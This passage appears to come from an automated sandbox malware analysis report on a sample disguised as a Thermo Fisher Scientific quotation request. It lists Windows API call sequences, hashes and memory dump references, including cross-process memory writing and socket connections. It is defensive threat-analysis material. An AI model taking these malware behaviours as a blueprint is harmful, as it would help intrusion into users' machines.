                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 3701255441-0
                                                              • Opcode ID: 53c059d608b6e63942747ba9137ad106d67256d0187f56c9b3d4caace11b1b7e
                                                              • Instruction ID: 01b93d657ed8e7a6e44569dca492bff134af34cab2ed9cf01d9987dc7fc0fbbb
                                                              • Opcode Fuzzy Hash: 53c059d608b6e63942747ba9137ad106d67256d0187f56c9b3d4caace11b1b7e
                                                              • Instruction Fuzzy Hash: CE21AE31200214AFCB54AF68CD85BBE77ABAF48721F04454DF946AB3D2CF74AC058B65
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 00658441
                                                              • GetForegroundWindow.USER32 ref: 00658458
                                                              • GetDC.USER32(00000000), ref: 00658494
                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 006584A0
                                                              • ReleaseDC.USER32(00000000,00000003), ref: 006584DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ForegroundPixelRelease
                                                              • String ID:
                                                              • API String ID: 4156661090-0
                                                              • Opcode ID: 09c778c52543e8ab8e76f7d94a54ce6c1e133915cb84a78d317372aadc632f6f
                                                              • Instruction ID: ab0349cc101116fac56ea321d1d4c0511afa6380985ea31c894e92a900121ec8
                                                              • Opcode Fuzzy Hash: 09c778c52543e8ab8e76f7d94a54ce6c1e133915cb84a78d317372aadc632f6f
                                                              • Instruction Fuzzy Hash: 83218175A00204AFDB44EFA4C889AAEBBE6EF48301F04857DE95997291DB70ED44CB64
                                                              APIs
                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0061AFE3
                                                              • SelectObject.GDI32(?,00000000), ref: 0061AFF2
                                                              • BeginPath.GDI32(?), ref: 0061B009
                                                              • SelectObject.GDI32(?,00000000), ref: 0061B033
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$BeginCreatePath
                                                              • String ID:
                                                              • API String ID: 3225163088-0
                                                              • Opcode ID: 9111b9e19505e68d1c267c1dbacda9b9edbc9d55ec6bbec40e45dee96235611f
                                                              • Instruction ID: b5e76eb34626ae3378a5f99d0d34d14f65d2ef465e672ec7f94c0e2a6dce232e
                                                              • Opcode Fuzzy Hash: 9111b9e19505e68d1c267c1dbacda9b9edbc9d55ec6bbec40e45dee96235611f
                                                              • Instruction Fuzzy Hash: C2217470800205EFDB10DF56EC48FEA7B6BBB16366F18631AF4259A2A1C3708995CB91
                                                              APIs
                                                              • __calloc_crt.LIBCMT ref: 006221A9
                                                              • CreateThread.KERNEL32(?,?,006222DF,00000000,?,?), ref: 006221ED
                                                              • GetLastError.KERNEL32 ref: 006221F7
                                                              • _free.LIBCMT ref: 00622200
                                                              • __dosmaperr.LIBCMT ref: 0062220B
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                              • String ID:
                                                              • API String ID: 2664167353-0
                                                              • Opcode ID: 60149dbce389cc949909832e148acbc7995fdcad4ef26d8e595f68e67a5d7908
                                                              • Instruction ID: 4c55f990695bf64f9aac86ecec20ca3dda316621cb6961faebe5690fc9c9c1d6
                                                              • Opcode Fuzzy Hash: 60149dbce389cc949909832e148acbc7995fdcad4ef26d8e595f68e67a5d7908
                                                              • Instruction Fuzzy Hash: EA110832105B27BF9B11AF65FC41DAB379BEF01770B10012DFA1486192DB32D8518FA5
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0063ABD7
                                                              • GetLastError.KERNEL32(?,0063A69F,?,?,?), ref: 0063ABE1
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,0063A69F,?,?,?), ref: 0063ABF0
                                                              • HeapAlloc.KERNEL32(00000000,?,0063A69F,?,?,?), ref: 0063ABF7
                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0063AC0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              • Opcode ID: 9fa0a124e96edf174b57ed4a48fc55a2eece41b74470d68c96c3affe50b656ec
                                                              • Instruction ID: fdab83fad906d31636503723fc3fdbc1b107c96144c08b3a4bf1313d795e0a39
                                                              • Opcode Fuzzy Hash: 9fa0a124e96edf174b57ed4a48fc55a2eece41b74470d68c96c3affe50b656ec
                                                              • Instruction Fuzzy Hash: 69013171200204BFDB105FA5DC48DAB3BAEFF8A755B101529F585C3290D671DC80DBB1
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647A74
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00647A82
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00647A8A
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00647A94
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647AD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              • Opcode ID: 889677565f1a34c96e76c5270497ccd0fcb3222dd8caa03ca85324ca012943a7
                                                              • Instruction ID: 4b90ccfd6ea2e60fede601a5e41c89b5df4c36763e8260c0e837373804b6aed3
                                                              • Opcode Fuzzy Hash: 889677565f1a34c96e76c5270497ccd0fcb3222dd8caa03ca85324ca012943a7
                                                              • Instruction Fuzzy Hash: B6014C71D04619EBCF00AFE4DC4CADDBB7AFF08751F050595E942B2290DB30969487A5
                                                              APIs
                                                              • CLSIDFromProgID.OLE32 ref: 00639ADC
                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00639AF7
                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 00639B05
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00639B15
                                                              • CLSIDFromString.OLE32(?,?), ref: 00639B21
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: c3458a85310b31c383185c33f31dda54a2cdc71de8b95bf23baad0a7f46ec223
                                                              • Instruction ID: cffa19ca8a651f5dea7b6bc48c96dbcca7e8b39a849217817080e7feaa6b3bef
                                                              • Opcode Fuzzy Hash: c3458a85310b31c383185c33f31dda54a2cdc71de8b95bf23baad0a7f46ec223
                                                              • Instruction Fuzzy Hash: 8C018BB6600208BFDB104F68EC44BAABBEEEF49392F148024F906D2250D7B0DD009BF0
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0063AA79
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0063AA83
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0063AA92
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0063AA99
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0063AAAF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 3c325de0cc9710fc9e7c0bb377d4a16e25539ad2d51f8ac9b4892db31f413910
                                                              • Instruction ID: a1522d42e5c4ba7ed8aab01bdf41fb6b780f3078f095491ae70c7bdd2e336a43
                                                              • Opcode Fuzzy Hash: 3c325de0cc9710fc9e7c0bb377d4a16e25539ad2d51f8ac9b4892db31f413910
                                                              • Instruction Fuzzy Hash: F6F044712002087FDB115FA4AC8DEAB3B6EFF49754F100619F981C7290D7619C41DB71
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0063AADA
                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0063AAE4
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0063AAF3
                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0063AAFA
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0063AB10
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 2b3e5f1e3faa38083f1690e321078a0bd6e61850ad43eeea3b4049803aae9669
                                                              • Instruction ID: 5d5d35546272b2871ea156096c0dbfe11879ff534f085d020bf545b24d151f79
                                                              • Opcode Fuzzy Hash: 2b3e5f1e3faa38083f1690e321078a0bd6e61850ad43eeea3b4049803aae9669
                                                              • Instruction Fuzzy Hash: 08F044712002047FDB110FA4EC88EBB7B6EFF45754F100229F582C7290D66198019B71
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0063EC94
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0063ECAB
                                                              • MessageBeep.USER32(00000000), ref: 0063ECC3
                                                              • KillTimer.USER32(?,0000040A), ref: 0063ECDF
                                                              • EndDialog.USER32(?,00000001), ref: 0063ECF9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: d82d3d14692342156a9b10a60de09b5a91167542d4db565c88a9ae23307a27b3
                                                              • Instruction ID: 1460e422c9a30f1eba178d823d5ac63b010e54e936cb9470792b2eb4435d249a
                                                              • Opcode Fuzzy Hash: d82d3d14692342156a9b10a60de09b5a91167542d4db565c88a9ae23307a27b3
                                                              • Instruction Fuzzy Hash: 4701A430940704ABEB245B50DE4EFDA77BAFF00705F002659B593B14E1DBF5AA85CBA0
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 0061B0BA
                                                              • StrokeAndFillPath.GDI32(?,?,0067E680,00000000,?,?,?), ref: 0061B0D6
                                                              • SelectObject.GDI32(?,00000000), ref: 0061B0E9
                                                              • DeleteObject.GDI32 ref: 0061B0FC
                                                              • StrokePath.GDI32(?), ref: 0061B117
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: d64407a18d628766a40cbbaefc724902ed90561568f6583c2be000a9c0191080
                                                              • Instruction ID: a559dd46ae48eb1965a7f3171528e633c9c232cd326a571e099a793af484ae37
                                                              • Opcode Fuzzy Hash: d64407a18d628766a40cbbaefc724902ed90561568f6583c2be000a9c0191080
                                                              • Instruction Fuzzy Hash: B4F0C930000244EFDB21AF66EC0DBA53B67AB12366F18A315E465891F2C7358AA6DF60
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0064F2DA
                                                              • CoCreateInstance.OLE32(0068DA7C,00000000,00000001,0068D8EC,?), ref: 0064F2F2
                                                              • CoUninitialize.OLE32 ref: 0064F555
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize
                                                              • String ID: .lnk
                                                              • API String ID: 948891078-24824748
                                                              • Opcode ID: 4d9bd12ec371352238ab2113e94bcd3e0dbd3ccc2971ff4c83e5f92455e036a8
                                                              • Instruction ID: aa6d47080dbb9608041997052fb40438c7e311b7a335efff542a9a0321a17eda
                                                              • Opcode Fuzzy Hash: 4d9bd12ec371352238ab2113e94bcd3e0dbd3ccc2971ff4c83e5f92455e036a8
                                                              • Instruction Fuzzy Hash: 84A15CB1104201AFD344EF64C891EAFB7EEEF98314F004A1DF55597192EB70EA49CBA6
                                                              APIs
                                                                • Part of subcall function 0060660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006053B1,?,?,006061FF,?,00000000,00000001,00000000), ref: 0060662F
                                                              • CoInitialize.OLE32(00000000), ref: 0064E85D
                                                              • CoCreateInstance.OLE32(0068DA7C,00000000,00000001,0068D8EC,?), ref: 0064E876
                                                              • CoUninitialize.OLE32 ref: 0064E893
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                              • String ID: .lnk
                                                              • API String ID: 2126378814-24824748
                                                              • Opcode ID: 899ea7fe9f30a2137297c77731523d1b9aa276e2c88e67fbf5a4bc9fdc6e54ea
                                                              • Instruction ID: ae8aeabb1122947c49e346ece8bb01ad1bd36ad114f82d8f335e9b997c239c00
                                                              • Opcode Fuzzy Hash: 899ea7fe9f30a2137297c77731523d1b9aa276e2c88e67fbf5a4bc9fdc6e54ea
                                                              • Instruction Fuzzy Hash: E3A135756043019FCB54EF24C484D6ABBE6BF89310F14899CF9969B3A2CB32ED45CB91
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 006232ED
                                                                • Part of subcall function 0062E0D0: __87except.LIBCMT ref: 0062E10B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__87except__start
                                                              • String ID: pow
                                                              • API String ID: 2905807303-2276729525
                                                              • Opcode ID: 664261a5a2d6ee97f02f2f7cb125a62ae4e274f6f868cfdb3cbbb74893bbd1a1
                                                              • Instruction ID: d8268ae33c14bf277a28a40eabdc8898b8869a9198892a804f300f19c47beb56
                                                              • Opcode Fuzzy Hash: 664261a5a2d6ee97f02f2f7cb125a62ae4e274f6f868cfdb3cbbb74893bbd1a1
                                                              • Instruction Fuzzy Hash: 35515D31A09E32D2C715B714F9013BA3B9B9B40710F205D39E486823D9DF3A8F959E46
                                                              APIs
                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0069DC50,?,0000000F,0000000C,00000016,0069DC50,?), ref: 00644645
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 006446C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                              • String ID: REMOVE$THIS
                                                              • API String ID: 3797816924-776492005
                                                              • Opcode ID: b8c3c14f662a2f51a1e576fad0a8c2020826620619aafe68732d383fe9cb8ac0
                                                              • Instruction ID: 10021a3052e1f17517727c9a2c4c9943cb9a60e5c87b6422ab8c35716d50005f
                                                              • Opcode Fuzzy Hash: b8c3c14f662a2f51a1e576fad0a8c2020826620619aafe68732d383fe9cb8ac0
                                                              • Instruction Fuzzy Hash: 22416F74A002199FCF44DFA4C882AAEB7B6FF49304F148059E956AB392DF34DD46CB54
                                                              APIs
                                                                • Part of subcall function 0064430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0063BC08,?,?,00000034,00000800,?,00000034), ref: 00644335
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0063C1D3
                                                                • Part of subcall function 006442D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0063BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00644300
                                                                • Part of subcall function 0064422F: GetWindowThreadProcessId.USER32(?,?), ref: 0064425A
                                                                • Part of subcall function 0064422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0063BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0064426A
                                                                • Part of subcall function 0064422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0063BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00644280
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0063C240
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0063C28D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
